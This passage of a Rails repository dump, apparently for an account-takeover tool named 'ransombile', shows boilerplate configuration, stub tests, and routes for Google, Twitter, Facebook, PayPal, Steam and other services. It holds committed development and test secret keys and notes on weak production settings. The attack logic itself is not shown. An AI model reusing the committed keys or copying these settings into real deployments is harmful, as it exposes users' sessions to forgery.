This slows down response time but is perfect for development 6 | # since you don't have to restart the web server when you make code changes. 7 | config.cache_classes = false 8 | 9 | # Do not eager load code on boot. 10 | config.eager_load = false 11 | 12 | # Show full error reports. 13 | config.consider_all_requests_local = true 14 | 15 | # Enable/disable caching. By default caching is disabled. 16 | if Rails.root.join('tmp/caching-dev.txt').exist? 17 | config.action_controller.perform_caching = true 18 | 19 | config.cache_store = :memory_store 20 | config.public_file_server.headers = { 21 | 'Cache-Control' => 'public, max-age=172800' 22 | } 23 | else 24 | config.action_controller.perform_caching = false 25 | 26 | config.cache_store = :null_store 27 | end 28 | 29 | # Don't care if the mailer can't send. 30 | config.action_mailer.raise_delivery_errors = false 31 | 32 | config.action_mailer.perform_caching = false 33 | 34 | # Print deprecation notices to the Rails logger. 35 | config.active_support.deprecation = :log 36 | 37 | # Raise an error on page load if there are pending migrations. 38 | config.active_record.migration_error = :page_load 39 | 40 | # Debug mode disables concatenation and preprocessing of assets. 41 | # This option may cause significant delays in view rendering with a large 42 | # number of complex assets. 43 | config.assets.debug = true 44 | 45 | # Suppress logger output for asset requests. 46 | config.assets.quiet = true 47 | 48 | # Raises error for missing translations 49 | # config.action_view.raise_on_missing_translations = true 50 | 51 | # Use an evented file watcher to asynchronously detect changes in source code, 52 | # routes, locales, etc. This feature depends on the listen gem. 
53 | config.file_watcher = ActiveSupport::EventedFileUpdateChecker 54 | end 55 | -------------------------------------------------------------------------------- /config/environments/production.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # Code is not reloaded between requests. 5 | config.cache_classes = true 6 | 7 | # Eager load code on boot. This eager loads most of Rails and 8 | # your application in memory, allowing both threaded web servers 9 | # and those relying on copy on write to perform better. 10 | # Rake tasks automatically ignore this option for performance. 11 | config.eager_load = true 12 | 13 | # Full error reports are disabled and caching is turned on. 14 | config.consider_all_requests_local = false 15 | config.action_controller.perform_caching = true 16 | 17 | # Disable serving static files from the `/public` folder by default since 18 | # Apache or NGINX already handles this. 19 | config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present? 20 | 21 | # Compress JavaScripts and CSS. 22 | config.assets.js_compressor = :uglifier 23 | # config.assets.css_compressor = :sass 24 | 25 | # Do not fallback to assets pipeline if a precompiled asset is missed. 26 | config.assets.compile = false 27 | 28 | # `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb 29 | 30 | # Enable serving of images, stylesheets, and JavaScripts from an asset server. 31 | # config.action_controller.asset_host = 'http://assets.example.com' 32 | 33 | # Specifies the header that your server uses for sending files. 
34 | # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache 35 | # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX 36 | 37 | # Mount Action Cable outside main process or domain 38 | # config.action_cable.mount_path = nil 39 | # config.action_cable.url = 'wss://example.com/cable' 40 | # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ] 41 | 42 | # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies. While the setting below stays commented out, none of this is enforced: the session cookie is not marked secure and can travel over plain HTTP. 43 | # config.force_ssl = true 44 | 45 | # Use the lowest log level to ensure availability of diagnostic information 46 | # when problems arise. At :debug the log also records SQL statements with their bound values, so restrict who can read production logs or raise the level to :info. 47 | config.log_level = :debug 48 | 49 | # Prepend all log lines with the following tags. 50 | config.log_tags = [ :request_id ] 51 | 52 | # Use a different cache store in production. 53 | # config.cache_store = :mem_cache_store 54 | 55 | # Use a real queuing backend for Active Job (and separate queues per environment) 56 | # config.active_job.queue_adapter = :resque 57 | # config.active_job.queue_name_prefix = "ransombile_#{Rails.env}" 58 | config.action_mailer.perform_caching = false 59 | 60 | # Ignore bad email addresses and do not raise email delivery errors. 61 | # Set this to true and configure the email server for immediate delivery to raise delivery errors. 62 | # config.action_mailer.raise_delivery_errors = false 63 | 64 | # Enable locale fallbacks for I18n (makes lookups for any locale fall back to 65 | # the I18n.default_locale when a translation cannot be found). 66 | config.i18n.fallbacks = true 67 | 68 | # Send deprecation notices to registered listeners. 69 | config.active_support.deprecation = :notify 70 | 71 | # Use default logging formatter so that PID and timestamp are not suppressed. 72 | config.log_formatter = ::Logger::Formatter.new 73 | 74 | # Use a different logger for distributed setups. 
75 | # require 'syslog/logger' 76 | # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name') 77 | 78 | if ENV["RAILS_LOG_TO_STDOUT"].present? 79 | logger = ActiveSupport::Logger.new(STDOUT) 80 | logger.formatter = config.log_formatter 81 | config.logger = ActiveSupport::TaggedLogging.new(logger) 82 | end 83 | 84 | # Do not dump schema after migrations. 85 | config.active_record.dump_schema_after_migration = false 86 | end 87 | -------------------------------------------------------------------------------- /config/environments/test.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # The test environment is used exclusively to run your application's 5 | # test suite. You never need to work with it otherwise. Remember that 6 | # your test database is "scratch space" for the test suite and is wiped 7 | # and recreated between test runs. Don't rely on the data there! 8 | config.cache_classes = true 9 | 10 | # Do not eager load code on boot. This avoids loading your whole application 11 | # just for the purpose of running a single test. If you are using a tool that 12 | # preloads Rails for running tests, you may have to set it to true. 13 | config.eager_load = false 14 | 15 | # Configure public file server for tests with Cache-Control for performance. 16 | config.public_file_server.enabled = true 17 | config.public_file_server.headers = { 18 | 'Cache-Control' => 'public, max-age=3600' 19 | } 20 | 21 | # Show full error reports and disable caching. 22 | config.consider_all_requests_local = true 23 | config.action_controller.perform_caching = false 24 | 25 | # Raise exceptions instead of rendering exception templates. 26 | config.action_dispatch.show_exceptions = false 27 | 28 | # Disable request forgery protection in test environment. 
29 | config.action_controller.allow_forgery_protection = false 30 | config.action_mailer.perform_caching = false 31 | 32 | # Tell Action Mailer not to deliver emails to the real world. 33 | # The :test delivery method accumulates sent emails in the 34 | # ActionMailer::Base.deliveries array. 35 | config.action_mailer.delivery_method = :test 36 | 37 | # Print deprecation notices to the stderr. 38 | config.active_support.deprecation = :stderr 39 | 40 | # Raises error for missing translations 41 | # config.action_view.raise_on_missing_translations = true 42 | end 43 | -------------------------------------------------------------------------------- /config/initializers/application_controller_renderer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # ApplicationController.renderer.defaults.merge!( 4 | # http_host: 'example.org', 5 | # https: false 6 | # ) 7 | -------------------------------------------------------------------------------- /config/initializers/assets.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Version of your assets, change this if you want to expire all your assets. 4 | Rails.application.config.assets.version = '1.0' 5 | 6 | # Add additional assets to the asset load path 7 | # Rails.application.config.assets.paths << Emoji.images_path 8 | 9 | # Precompile additional assets. 10 | # application.js, application.css, and all non-JS/CSS in app/assets folder are already added. 11 | # Rails.application.config.assets.precompile += %w( search.js ) 12 | -------------------------------------------------------------------------------- /config/initializers/backtrace_silencers.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 
2 | 3 | # You can add backtrace silencers for libraries that you're using but don't wish to see in your backtraces. 4 | # Rails.backtrace_cleaner.add_silencer { |line| line =~ /my_noisy_library/ } 5 | 6 | # You can also remove all the silencers if you're trying to debug a problem that might stem from framework code. 7 | # Rails.backtrace_cleaner.remove_silencers! 8 | -------------------------------------------------------------------------------- /config/initializers/cookies_serializer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Specify a serializer for the signed and encrypted cookie jars. 4 | # Valid options are :json, :marshal, and :hybrid. Keep :json: with :marshal or :hybrid, cookie contents are deserialized with Marshal, which is unsafe if the signing key is ever exposed. 5 | Rails.application.config.action_dispatch.cookies_serializer = :json 6 | -------------------------------------------------------------------------------- /config/initializers/filter_parameter_logging.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Configure sensitive parameters which will be filtered from the log file. Only parameters whose names match an entry here are masked; every other request parameter is logged in clear. 4 | Rails.application.config.filter_parameters += [:password] 5 | -------------------------------------------------------------------------------- /config/initializers/inflections.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Add new inflection rules using the following format. Inflections 4 | # are locale specific, and you may define rules for as many different 5 | # locales as you wish. 
All of these examples are active by default: 6 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 7 | # inflect.plural /^(ox)$/i, '\1en' 8 | # inflect.singular /^(ox)en/i, '\1' 9 | # inflect.irregular 'person', 'people' 10 | # inflect.uncountable %w( fish sheep ) 11 | # end 12 | 13 | # These inflection rules are supported but not enabled by default: 14 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 15 | # inflect.acronym 'RESTful' 16 | # end 17 | -------------------------------------------------------------------------------- /config/initializers/mime_types.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Add new mime types for use in respond_to blocks: 4 | # Mime::Type.register "text/richtext", :rtf 5 | -------------------------------------------------------------------------------- /config/initializers/new_framework_defaults.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | # 3 | # This file contains migration options to ease your Rails 5.0 upgrade. 4 | # 5 | # Read the Guide for Upgrading Ruby on Rails for more info on each option. 6 | 7 | # Enable per-form CSRF tokens. Previous versions had false. 8 | Rails.application.config.action_controller.per_form_csrf_tokens = true 9 | 10 | # Enable origin-checking CSRF mitigation. Previous versions had false. 11 | Rails.application.config.action_controller.forgery_protection_origin_check = true 12 | 13 | # Make Ruby 2.4 preserve the timezone of the receiver when calling `to_time`. 14 | # Previous versions had false. 15 | ActiveSupport.to_time_preserves_timezone = true 16 | 17 | # Require `belongs_to` associations by default. Previous versions had false. 
18 | Rails.application.config.active_record.belongs_to_required_by_default = true 19 | 20 | # Do not halt callback chains when a callback returns false. Previous versions had true. 21 | ActiveSupport.halt_callback_chains_on_return_false = false 22 | 23 | # Configure SSL options to enable HSTS with subdomains. Previous versions had false. 24 | Rails.application.config.ssl_options = { hsts: { subdomains: true } } 25 | -------------------------------------------------------------------------------- /config/initializers/session_store.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | Rails.application.config.session_store :cookie_store, key: '_ransombile_session' 4 | -------------------------------------------------------------------------------- /config/initializers/wrap_parameters.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # This file contains settings for ActionController::ParamsWrapper which 4 | # is enabled by default. 5 | 6 | # Enable parameter wrapping for JSON. You can disable this by setting :format to an empty array. 7 | ActiveSupport.on_load(:action_controller) do 8 | wrap_parameters format: [:json] 9 | end 10 | 11 | # To enable root element in JSON for ActiveRecord objects. 12 | # ActiveSupport.on_load(:active_record) do 13 | # self.include_root_in_json = true 14 | # end 15 | -------------------------------------------------------------------------------- /config/locales/en.yml: -------------------------------------------------------------------------------- 1 | # Files in the config/locales directory are used for internationalization 2 | # and are automatically loaded by Rails. If you want to use locales other 3 | # than English, add the necessary files in this directory. 
4 | # 5 | # To use the locales, use `I18n.t`: 6 | # 7 | # I18n.t 'hello' 8 | # 9 | # In views, this is aliased to just `t`: 10 | # 11 | # <%= t('hello') %> 12 | # 13 | # To use a different locale, set it with `I18n.locale`: 14 | # 15 | # I18n.locale = :es 16 | # 17 | # This would use the information in config/locales/es.yml. 18 | # 19 | # To learn more, please read the Rails Internationalization guide 20 | # available at http://guides.rubyonrails.org/i18n.html. 21 | 22 | en: 23 | hello: "Hello world" 24 | -------------------------------------------------------------------------------- /config/puma.rb: -------------------------------------------------------------------------------- 1 | # Puma can serve each request in a thread from an internal thread pool. 2 | # The `threads` method setting takes two numbers a minimum and maximum. 3 | # Any libraries that use thread pools should be configured to match 4 | # the maximum value specified for Puma. Default is set to 5 threads for minimum 5 | # and maximum, this matches the default thread size of Active Record. 6 | # 7 | threads_count = ENV.fetch("RAILS_MAX_THREADS") { 5 }.to_i 8 | threads threads_count, threads_count 9 | 10 | # Specifies the `port` that Puma will listen on to receive requests, default is 3000. 11 | # 12 | port ENV.fetch("PORT") { 3000 } 13 | 14 | # Specifies the `environment` that Puma will run in. 15 | # 16 | environment ENV.fetch("RAILS_ENV") { "development" } 17 | 18 | # Specifies the number of `workers` to boot in clustered mode. 19 | # Workers are forked webserver processes. If using threads and workers together 20 | # the concurrency of the application would be max `threads` * `workers`. 21 | # Workers do not work on JRuby or Windows (both of which do not support 22 | # processes). 23 | # 24 | # workers ENV.fetch("WEB_CONCURRENCY") { 2 } 25 | 26 | # Use the `preload_app!` method when specifying a `workers` number. 
27 | # This directive tells Puma to first boot the application and load code 28 | # before forking the application. This takes advantage of Copy On Write 29 | # process behavior so workers use less memory. If you use this option 30 | # you need to make sure to reconnect any threads in the `on_worker_boot` 31 | # block. 32 | # 33 | # preload_app! 34 | 35 | # The code in the `on_worker_boot` will be called if you are using 36 | # clustered mode by specifying a number of `workers`. After each worker 37 | # process is booted this block will be run, if you are using `preload_app!` 38 | # option you will want to use this block to reconnect to any threads 39 | # or connections that may have been created at application boot, Ruby 40 | # cannot share connections between processes. 41 | # 42 | # on_worker_boot do 43 | # ActiveRecord::Base.establish_connection if defined?(ActiveRecord) 44 | # end 45 | 46 | # Allow puma to be restarted by `rails restart` command. 47 | plugin :tmp_restart 48 | -------------------------------------------------------------------------------- /config/routes.rb: -------------------------------------------------------------------------------- 1 | Rails.application.routes.draw do 2 | get 'ransombile/index' 3 | get 'ransombile/checkMail' 4 | 5 | get 'google/initiate' 6 | get 'google/finish' 7 | 8 | get 'twitter/initiate' 9 | get 'twitter/finish' 10 | 11 | get 'facebook/initiate' 12 | get 'facebook/finish' 13 | 14 | get 'linkedin/initiate' 15 | get 'linkedin/finish' 16 | 17 | get 'paypal/initiate' 18 | get 'paypal/finish' 19 | 20 | get 'ebay/initiate' 21 | get 'ebay/finish' 22 | 23 | get 'wordpress/initiate' 24 | get 'wordpress/finish' 25 | 26 | get 'steam/initiate' 27 | get 'steam/finish' 28 | 29 | root 'ransombile#index' 30 | end 31 | -------------------------------------------------------------------------------- /config/secrets.yml: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server 
when you modify this file. 2 | 3 | # Your secret key is used for verifying the integrity of signed cookies. 4 | # If you change this key, all old signed cookies will become invalid! 5 | 6 | # Make sure the secret is at least 30 characters and all random, 7 | # no regular words or you'll be exposed to dictionary attacks. 8 | # You can use `rails secret` to generate a secure secret key. 9 | 10 | # Make sure the secrets in this file are kept private 11 | # if you're sharing your code publicly. The development and test keys below are committed with the repository, so treat them as public: anyone who has them can forge signed cookies for an instance that runs with them. Never reuse them outside local development and tests. 12 | 13 | development: 14 | secret_key_base: 20b36ab1ee5d5a48bb24b66e4c383187aadadb3d8a5e7ef3ee99caad9f7ce4ed8925cd88d06e612bf9b0cecd6b20dc148d735737bcb2558fd9890fd46f0ebb5d 15 | 16 | test: 17 | secret_key_base: e413878448283dabf98a9e864628e1325c593f8818ecb4e4ce8cdb00babcaa928d141f34883707b508e51a713f12a032852ad15d3fec82f71b2dde4d2be82462 18 | 19 | # Do not keep production secrets in the repository, 20 | # instead read values from the environment. 21 | production: 22 | secret_key_base: <%= ENV["SECRET_KEY_BASE"] %> 23 | -------------------------------------------------------------------------------- /config/spring.rb: -------------------------------------------------------------------------------- 1 | %w( 2 | .ruby-version 3 | .rbenv-vars 4 | tmp/restart.txt 5 | tmp/caching-dev.txt 6 | ).each { |path| Spring.watch(path) } 7 | -------------------------------------------------------------------------------- /db/development.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/db/development.sqlite3 -------------------------------------------------------------------------------- /db/seeds.rb: -------------------------------------------------------------------------------- 1 | # This file should contain all the record creation needed to seed the database with its default values. 
2 | # The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup). 3 | # 4 | # Examples: 5 | # 6 | # movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }]) 7 | # Character.create(name: 'Luke', movie: movies.first) 8 | -------------------------------------------------------------------------------- /lib/assets/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/lib/assets/.keep -------------------------------------------------------------------------------- /lib/tasks/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/lib/tasks/.keep -------------------------------------------------------------------------------- /log/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/log/.keep -------------------------------------------------------------------------------- /public/404.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The page you were looking for doesn't exist (404) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

The page you were looking for doesn't exist.

62 |

You may have mistyped the address or the page may have moved.

63 |
64 |

If you are the application owner check the logs for more information.

65 |
66 | 67 | 68 | -------------------------------------------------------------------------------- /public/422.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The change you wanted was rejected (422) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

The change you wanted was rejected.

62 |

Maybe you tried to change something you didn't have access to.

63 |
64 |

If you are the application owner check the logs for more information.

65 |
66 | 67 | 68 | -------------------------------------------------------------------------------- /public/500.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | We're sorry, but something went wrong (500) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

We're sorry, but something went wrong.

62 |
63 |

If you are the application owner check the logs for more information.

64 |
65 | 66 | 67 | -------------------------------------------------------------------------------- /public/apple-touch-icon-precomposed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/public/apple-touch-icon-precomposed.png -------------------------------------------------------------------------------- /public/apple-touch-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/public/apple-touch-icon.png -------------------------------------------------------------------------------- /public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/public/favicon.ico -------------------------------------------------------------------------------- /public/robots.txt: -------------------------------------------------------------------------------- 1 | # See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file 2 | # 3 | # To ban all spiders from the entire site uncomment the next two lines: 4 | # User-agent: * 5 | # Disallow: / 6 | -------------------------------------------------------------------------------- /test/controllers/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/test/controllers/.keep -------------------------------------------------------------------------------- /test/controllers/ebay_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class EbayControllerTest < ActionDispatch::IntegrationTest 4 | # test 
"the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /test/controllers/facebook_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class FacebookControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /test/controllers/google_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class GoogleControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /test/controllers/linkedin_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class LinkedinControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /test/controllers/paypal_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class PaypalControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /test/controllers/ransombile_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class RansombileControllerTest < ActionDispatch::IntegrationTest 4 | test "should get index" do 5 | get ransombile_index_url 6 | assert_response :success 7 | end 8 | 9 | end 10 | 
-------------------------------------------------------------------------------- /test/controllers/steam_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class SteamControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /test/controllers/twitter_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class TwitterControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /test/controllers/website_template_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class WebsiteTemplateControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /test/controllers/wordpress_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class WordpressControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /test/fixtures/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/test/fixtures/.keep -------------------------------------------------------------------------------- /test/fixtures/files/.keep: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/test/fixtures/files/.keep
--------------------------------------------------------------------------------
/test/helpers/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/test/helpers/.keep
--------------------------------------------------------------------------------
/test/integration/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/test/integration/.keep
--------------------------------------------------------------------------------
/test/mailers/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/test/mailers/.keep
--------------------------------------------------------------------------------
/test/models/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/test/models/.keep
--------------------------------------------------------------------------------
/test/test_helper.rb:
--------------------------------------------------------------------------------
# Shared bootstrap required by every test file in this suite.

# Default to the "test" environment only when RAILS_ENV is not already set.
# NOTE(review): because of ||=, a RAILS_ENV exported in the calling shell wins;
# the suite would then load that environment's configuration, and fixture
# loading presumably targets whatever database it points at. Confirm the
# variable is unset or "test" before running.
ENV['RAILS_ENV'] ||= 'test'
# Resolves to config/environment at the application root (one level above test/).
require File.expand_path('../../config/environment', __FILE__)
require 'rails/test_help'

# Reopens ActiveSupport::TestCase so the settings below apply to every test case
# that inherits from it.
class ActiveSupport::TestCase
  # Load all fixtures in test/fixtures/*.yml for all tests, in alphabetical order.
  fixtures :all

  # Add more helper methods to be used by all tests here...
end
--------------------------------------------------------------------------------
/tmp/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/tmp/.keep
--------------------------------------------------------------------------------
/tmp/restart.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/tmp/restart.txt
--------------------------------------------------------------------------------
/vendor/assets/javascripts/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/vendor/assets/javascripts/.keep
--------------------------------------------------------------------------------
/vendor/assets/stylesheets/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/vendor/assets/stylesheets/.keep
--------------------------------------------------------------------------------